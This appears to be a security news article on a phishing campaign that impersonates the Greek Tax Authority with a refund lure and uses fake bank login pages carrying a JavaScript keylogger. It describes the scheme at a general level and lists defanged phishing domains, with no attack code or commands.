Phishing Pages Now Embedding Keyloggers
Security analysts at Cyble have identified a notable phishing campaign targeting users in Greece. The operators behind this scam run phishing websites that mimic the official site of the Greek Tax Authority. These sites contain a keylogger that steals login credentials and other information as soon as it is entered.
How the Attack Works
The attack begins with standard phishing emails, where the scammers pose as the Greek Tax Authority and inform the recipient of some good news: supposedly, after a recalculation, they are owed a tax refund of €634.13. The email claims that the funds could not be automatically transferred to the recipient’s bank account due to unspecified issues.
As a result, the user is asked to visit the tax authority’s website and complete the verification process themselves. The emails contain links leading to several phishing sites designed to look like the official Greek Tax Authority website (such as govgr-tax[.]me/ret/tax, govgreece-tax[.]me, and mygov-refund[.]me/ret/tax).
Phishing Site Tactics
On the fake site, visitors are asked to select the bank where the funds should be sent. Victims are given seven options, including several major Greek banks. Depending on the bank selected, the user is redirected to another fake site. The login page is then styled to match the chosen financial institution.
When the victim begins entering their login credentials into the provided form, a JavaScript keylogger embedded on the page captures every keystroke and sends the data to the attackers.
Real-Time Data Theft
This method allows cybercriminals to access information in real time. Worse yet, even if the user changes their mind at the last moment and does not click the “Submit” button, it no longer matters—the information is compromised instantly, as it is being typed.
Researchers note that it is extremely rare for phishers to use real-time keylogging, and this attack targeting Greeks may signal the emergence of a new and highly dangerous trend among hackers. This approach can significantly increase the chances of successfully stealing credentials, and the JavaScript keylogger will load and operate even if the victim’s browser is set to block third-party trackers.